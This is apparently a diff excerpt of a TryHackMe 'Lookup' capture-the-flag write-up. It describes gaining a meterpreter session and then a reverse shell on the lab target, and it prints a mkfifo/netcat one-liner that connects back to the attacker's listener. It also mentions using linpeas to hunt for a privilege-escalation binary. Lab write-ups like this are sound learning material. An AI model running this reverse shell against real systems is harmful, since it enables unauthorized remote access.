DF1sh/TryHackMe-Rooms/Lookup/README.md

     set rhosts files.lookup.thm
     run

 And it should open a meterpreter session.
 Now, I can't use metasploit, so I used the `shell` command to drop to a system shell, and then opened a reverse shell on another terminal because I really don't know how to use meterpreter very well, I need to do a tutorial.
-For the reverse shell I opened a netcat listener on my machine and then used then from the dropped shell I run `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.14.90.188 5555 >/tmp/f`.
+For the reverse shell I opened a netcat listener on my machine and from the dropped shell I run `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.14.90.188 5555 >/tmp/f`.
 First thing I notice: the user `think` has the user flag, and inside his home directory I see a `.passwords` file that I can't read.
 So my guess is that I need to find a way to read that file. <br />
 Using linpeas on the target system, I found an interesting binary that might be exploited:<br />
 ![image](https://github.com/user-attachments/assets/883cfbee-381e-4cee-953c-747b15f65b58)<br />